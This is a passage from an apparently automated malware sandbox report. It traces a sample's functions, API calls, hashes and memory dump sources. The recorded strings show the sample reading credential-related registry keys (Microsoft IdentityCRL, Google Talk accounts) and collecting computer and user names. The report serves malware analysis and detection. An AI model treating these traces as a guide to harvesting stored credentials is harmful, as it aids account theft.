                                  • Part of subcall function 0040F177: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                  • Part of subcall function 0040F177: RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E6C,?), ref: 0040F595
                                • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E6C,?), ref: 0040F5A9
                                Strings
                                Memory Dump Source
                                • Source File: 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000018.00000002.471664194.000000000044F000.00000040.00000001.sdmp Download File
                                • Associated: 00000018.00000002.471679863.0000000000452000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                • API String ID: 2768085393-1693574875
                                • Opcode ID: fbe27986f187398f0f6099073cdbbb7c8c5267cb5e8994caa430772f60085481
                                • Instruction ID: 1e95abdde633212bff99c09de4f86b0a88236e9255236bdff490daf84838ddbe
                                • Opcode Fuzzy Hash: fbe27986f187398f0f6099073cdbbb7c8c5267cb5e8994caa430772f60085481
                                • Instruction Fuzzy Hash: 3F316FB2108305BFD710DF51DC80D9BB7ECEB89758F00093AFA84E2151D734D9198BAA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00408344, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00408043: memset.MSVCRT ref: 004080A5
                                  • Part of subcall function 00408043: memset.MSVCRT ref: 004080B9
                                  • Part of subcall function 00408043: memset.MSVCRT ref: 004080D3
                                  • Part of subcall function 00408043: memset.MSVCRT ref: 004080E8
                                  • Part of subcall function 00408043: GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                  • Part of subcall function 00408043: GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                  • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                  • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                  • Part of subcall function 00408043: strlen.MSVCRT ref: 0040815B
                                  • Part of subcall function 00408043: strlen.MSVCRT ref: 0040816A
                                  • Part of subcall function 00408043: memcpy.MSVCRT ref: 0040817C
                                  • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004107BA,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410424
                                • memset.MSVCRT ref: 00408392
                                  • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                • memset.MSVCRT ref: 004083E3
                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00408421
                                • RegCloseKey.ADVAPI32(?), ref: 00408448
                                Strings
                                • Software\Google\Google Talk\Accounts, xrefs: 00408363
                                Memory Dump Source
                                • Source File: 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000018.00000002.471664194.000000000044F000.00000040.00000001.sdmp Download File
                                • Associated: 00000018.00000002.471679863.0000000000452000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                • String ID: Software\Google\Google Talk\Accounts
                                • API String ID: 2959138223-1079885057
                                • Opcode ID: d775ac8ba569fd5f9c268c161b920f0f986bb662fffb9e6d05309f5eaf26b962
                                • Instruction ID: c6fde65740424625f6a31d6a262b66ef11e3a8462d59295f471bfbb40e3c967b
                                • Opcode Fuzzy Hash: d775ac8ba569fd5f9c268c161b920f0f986bb662fffb9e6d05309f5eaf26b962
                                • Instruction Fuzzy Hash: 5E2183B100824AAED610DF51DD42EABB7DCEF94344F00043EFA84911A2F675DD5D9BAB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00410344, Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0041036C
                                  • Part of subcall function 0040735C: sprintf.MSVCRT ref: 00407394
                                  • Part of subcall function 0040735C: memcpy.MSVCRT ref: 004073A7
                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410390
                                • memset.MSVCRT ref: 004103A7
                                • GetPrivateProfileStringA.KERNEL32(?,?,0044551F,?,00002000,?), ref: 004103C5
                                Memory Dump Source
                                • Source File: 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000018.00000002.471664194.000000000044F000.00000040.00000001.sdmp Download File
                                • Associated: 00000018.00000002.471679863.0000000000452000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                • String ID:
                                • API String ID: 3143880245-0
                                • Opcode ID: 452b48431850dc4cfeda6c40ef1c1e9db479f0d3b12d6eb92d0ce8910a14a719
                                • Instruction ID: 9d0f41c8c3888dc292d70de46467aaf9ffb36b28435196f73ffda5293cd27e0f
                                • Opcode Fuzzy Hash: 452b48431850dc4cfeda6c40ef1c1e9db479f0d3b12d6eb92d0ce8910a14a719
                                • Instruction Fuzzy Hash: B501847280431DBFEF116F60EC89EDB7B79EF04314F1000A6FA08A2052D6759D64DB69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004103E0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410407
                                  • Part of subcall function 004102F8: memset.MSVCRT ref: 00410316
                                  • Part of subcall function 004102F8: _itoa.MSVCRT ref: 0041032D
                                  • Part of subcall function 004102F8: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0041033C
                                Memory Dump Source
                                • Source File: 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000018.00000002.471664194.000000000044F000.00000040.00000001.sdmp Download File
                                • Associated: 00000018.00000002.471679863.0000000000452000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: PrivateProfile$StringWrite_itoamemset
                                • String ID:
                                • API String ID: 4165544737-0
                                • Opcode ID: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                • Instruction ID: a6fec7de448531cc7e5bdd8bb9ba05dfe42c6da5839e04c605b7484fd2ec2d67
                                • Opcode Fuzzy Hash: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                • Instruction Fuzzy Hash: 23E0BD3204060EBFCF125F80EC05AAA7BA6FF04354F24886AFD6804121D77299F0AB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00410166, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                Download Yara Rule
                                APIs
                                • FreeLibrary.KERNELBASE(?,0041019A,?,?,?,?,?,?,004041AC), ref: 00410172
                                Memory Dump Source
                                • Source File: 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000018.00000002.471664194.000000000044F000.00000040.00000001.sdmp Download File
                                • Associated: 00000018.00000002.471679863.0000000000452000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                • Instruction ID: 507e23945262d0460dd2b0da46a8ed0ea94319227dbecdfb5597338915b85de2
                                • Opcode Fuzzy Hash: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                • Instruction Fuzzy Hash: 6EC04C35510B019BEB219B22D949753B7E4AB05316F40C81CA59695451D7BCE494CE18
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions